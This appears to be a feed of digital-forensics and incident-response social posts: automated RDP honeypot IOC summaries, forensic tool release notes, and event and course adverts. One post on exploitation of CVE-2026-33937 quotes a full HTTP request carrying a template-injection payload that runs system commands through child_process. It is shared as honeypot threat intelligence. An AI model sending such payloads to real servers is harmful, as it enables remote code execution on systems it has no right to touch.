CIRCLE WITH A DOT

2026-05-21 RDP #Honeypot IOCs - 468 scansThread with top 3 features in each category and links to the full dataset#DFIR #InfoSecTop IPs:46.63.101.233 - 276193.169.194.14 - 57111.170.152.113 - 15Top ASNs:AS51784 - 276AS214576 - 57AS396982 - 45Top Accounts:hello - 309(empty) - 57Test - 30Top ISPs:X-city Customers and Private - 276Berdiev Ruslan Mukhabatovich - 57Google LLC - 45Top Clients:Unknown - 468Top Software:Unknown - 468Top Keyboards:Unknown - 468Top IP Classification:Unknown - 408hosting - 48hosting & proxy - 12Pastebin links with full 24-hr RDP Honeypot IOC Lists:Bad API request, invalid api_dev_key#CyberSec #SOC #Blueteam #SecOps #Security

2026-05-21 RDP #Honeypot IOCs - 312 scansThread with top 3 features in each category and links to the full dataset#DFIR #InfoSecTop IPs:46.63.101.233 - 184193.169.194.14 - 38111.170.152.113 - 10Top ASNs:AS51784 - 184AS214576 - 38AS396982 - 30Top Accounts:hello - 206(empty) - 38Test - 20Top ISPs:X-city Customers and Private - 184Berdiev Ruslan Mukhabatovich - 38Google LLC - 30Top Clients:Unknown - 312Top Software:Unknown - 312Top Keyboards:Unknown - 312Top IP Classification:Unknown - 272hosting - 32hosting & proxy - 8Pastebin links with full 24-hr RDP Honeypot IOC Lists:Bad API request, invalid api_dev_key#CyberSec #SOC #Blueteam #SecOps #Security

2026-05-21 RDP #Honeypot IOCs - 156 scansThread with top 3 features in each category and links to the full dataset#DFIR #InfoSecTop IPs:46.63.101.233 - 92193.169.194.14 - 19111.170.152.113 - 5Top ASNs:AS51784 - 92AS214576 - 19AS396982 - 15Top Accounts:hello - 103(empty) - 19Test - 10Top ISPs:X-city Customers and Private - 92Berdiev Ruslan Mukhabatovich - 19Google LLC - 15Top Clients:Unknown - 156Top Software:Unknown - 156Top Keyboards:Unknown - 156Top IP Classification:Unknown - 136hosting - 16hosting & proxy - 4Pastebin links with full 24-hr RDP Honeypot IOC Lists:Bad API request, invalid api_dev_key#CyberSec #SOC #Blueteam #SecOps #Security

Lots of movement happening in the #LEAPPs project. #LAVA (LEAPPs Artifact Viewer App) has been released. New releases for all the LEAPPs.️ New webpage with all listed releases by tool. No need to jump around GitHub repositories to find the latest executables. Mail list available so you can be the first to know about all the new stuff that is coming. We won't spam you.️ Sign up for the mailing list here: https://www.leapps.org/#mailing #DigitalForensics #MobileForensics #DFIR

2026-05-19 RDP #Honeypot IOCs - 420 scansThread with top 3 features in each category and links to the full dataset#DFIR #InfoSecTop IPs:46.63.101.233 - 99193.169.194.14 - 63124.222.173.104 - 57Top ASNs:AS51784 - 99AS214576 - 63AS45090 - 57Top Accounts:hello - 204(empty) - 66Test - 36Top ISPs:X-city Customers and Private - 99Berdiev Ruslan Mukhabatovich - 63China Internet Network Information Center - 57Top Clients:Unknown - 420Top Software:Unknown - 420Top Keyboards:Unknown - 420Top IP Classification:Unknown - 303hosting - 90proxy - 24Pastebin links with full 24-hr RDP Honeypot IOC Lists:Bad API request, invalid api_dev_key#CyberSec #SOC #Blueteam #SecOps #Security

The new LEAPPS.org webpage is online! New website design in dark mode as all pages should be. Releases page has collapsed the previous releases sections for easier navigation. Just press the bar and the previous releases are accessible. Sign up for our mailing list at the end of the home page. Easy way to keep track of the latest happenings in the LEAPPs & LAVA community. Much more coming up soon! Check it out: https://www.leapps.org/#DigitalForensics #DFIR #MobileForensics

Investigation Scenario You've discovered a user workstation with the Chrome Remote Desktop plugin installed. There's no business reason for the user to have this plugin, and they don't recall installing it. What do you look for to investigate whether an incident occurred and the extent of its impact?#InvestigationPath #DFIR #SOC

2026-05-08 RDP #Honeypot IOCs - 300 scansThread with top 3 features in each category and links to the full dataset#DFIR #InfoSecTop IPs:46.63.101.233 - 45104.248.62.230 - 45160.187.146.221 - 30Top ASNs:AS14061 - 48AS51784 - 45AS63949 - 42Top Accounts:hello - 156Test - 39eltons - 15Top ISPs:DigitalOcean, LLC - 48X-city Customers and Private - 45Akamai Technologies, Inc. - 42Top Clients:Unknown - 300Top Software:Unknown - 300Top Keyboards:Unknown - 300Top IP Classification:Unknown - 153hosting - 135proxy - 12Pastebin links with full 24-hr RDP Honeypot IOC Lists:Bad API request, invalid api_dev_key#CyberSec #SOC #Blueteam #SecOps #Security

2026-05-08 RDP #Honeypot IOCs - 200 scansThread with top 3 features in each category and links to the full dataset#DFIR #InfoSecTop IPs:46.63.101.233 - 30104.248.62.230 - 30160.187.146.221 - 20Top ASNs:AS14061 - 32AS51784 - 30AS63949 - 28Top Accounts:hello - 104Test - 26eltons - 10Top ISPs:DigitalOcean, LLC - 32X-city Customers and Private - 30Akamai Technologies, Inc. - 28Top Clients:Unknown - 200Top Software:Unknown - 200Top Keyboards:Unknown - 200Top IP Classification:Unknown - 102hosting - 90proxy - 8Pastebin links with full 24-hr RDP Honeypot IOC Lists:Bad API request, invalid api_dev_key#CyberSec #SOC #Blueteam #SecOps #Security

Seeing exploitation of CVE-2026-33937 but they target the example URI (/api/email/preview) that is only present in the writeup at https://github.com/EQSTLab/CVE-2026-33937 Here is a full request:POST /api/email/preview HTTP/1.1Host: x.x.x.x:8080Connection: closeContent-Length: 585Content-Type: application/jsonUser-Agent: Go-http-client/1.1{"subject":"Interactive RCE","tpl":{"body":[{"escaped":true,"loc":null,"params":[{"data":false,"depth":0,"loc":null,"original":"this","parts":[],"type":"PathExpression"},{"loc":null,"original":1,"type":"NumberLiteral","value":"{},{})) + process.mainModule.require('child_process').execSync('echo __HBSRCE__;id;uname -a;hostname;nproc;echo __HBSRCE___END').toString() //"}],"path":{"data":false,"depth":0,"loc":null,"original":"lookup","parts":["lookup"],"type":"PathExpression"},"strip":{"close":false,"open":false},"type":"MustacheStatement"}],"loc":null,"strip":{},"type":"Program"}}#dfir #honeypot #infosec #cybersecurity

There's a new Hindsight release! New features in v2026.04 include:- Parsing of Sessions_* and Tabs_* files (SNSS) into both the Timeline and a dedicated "Sessions" tab in the XLSX output- Parsing of Platform Notifications (including when shown, clicked, and more!)- More fields for URL Visit rows: Categories, Entities, Cluster, Window ID, Tab ID, and Response CodeMore details: https://dfir.blog/hindsight-parses-sessions-and-notifications/Release: https://github.com/RyanDFIR/hindsight/releases/tag/v2026.04#DFIR #Hindsight #Chrome #BF4SA

@volatility New Release: #volatility3 v2.28.0 - visit https://github.com/volatilityfoundation/volatility3/releases for details and downloads.#memoryforensics #dfir

Fresh Workshop Alert for BSides Luxembourg 2026!𝗞𝗨𝗡𝗔𝗜 𝗪𝗢𝗥𝗞𝗦𝗛𝗢𝗣: 𝗛𝗔𝗡𝗗𝗦-𝗢𝗡 𝗟𝗜𝗡𝗨𝗫 𝗧𝗛𝗥𝗘𝗔𝗧 𝗗𝗘𝗧𝗘𝗖𝗧𝗜𝗢𝗡 – Quentin JeromeReady to get your hands dirty with real-world Linux threat detection? This 4-hour hands-on workshop dives deep into Kunai, an open-source security monitoring tool built to bring powerful detection capabilities to Linux environments.Starting from the basics, you’ll deploy and configure Kunai, explore its architecture, and learn how to monitor and interpret system activity. Then, level up with advanced techniques—writing custom detection rules, integrating Indicators of Compromise (IoCs), and connecting with MISP for enriched threat intelligence.Through practical exercises and real-world scenarios, you’ll gain the skills needed to detect, investigate, and respond to threats across Linux systems—whether in production or research environments.Quentin Jerome is a Rust developer at CIRCL, focused on building open-source security tools for threat detection and incident response, with a passion for solving real-world security challenges. Conference Dates: 6–8 May 2026 | 09:00–18:00 14, Porte de France, Esch-sur-Alzette, Luxembourg️ Tickets: https://2026.bsides.lu/tickets/ Schedule: https://hackertracker.app/schedule?conf=BSIDESLUX2026#BSidesLuxembourg2026 #Workshop #LinuxSecurity #ThreatDetection #DFIR #OpenSource

️ El Curso de Autopsy Digital Forensics está permanente disponible en el aula virtual para acceso inmediato. WhatsApp: https://wa.me/51949304030 https://www.reydes.com/e/Curso_Forense_de_Autopsy #digitalforensics #dfir #diskforensics #incidentresponse #forensictools #datacarving #cybercrime

Drone and UAV ForensicThis repository is designed to accelerate the forensic analysis of DIY FPV drones and to help automate technical reporting from seized or recovered artifacts.The goal is pragmatic: extract useful evidence faster, normalize outputs, and produce data that can be reused in reports or shared into investigative platforms such as MISP. https://github.com/CIRCL/Drone-Forensic#drone #uav #opensource #dfir #threatintelligence #threatintel #misp #digitalforensics @circl @misp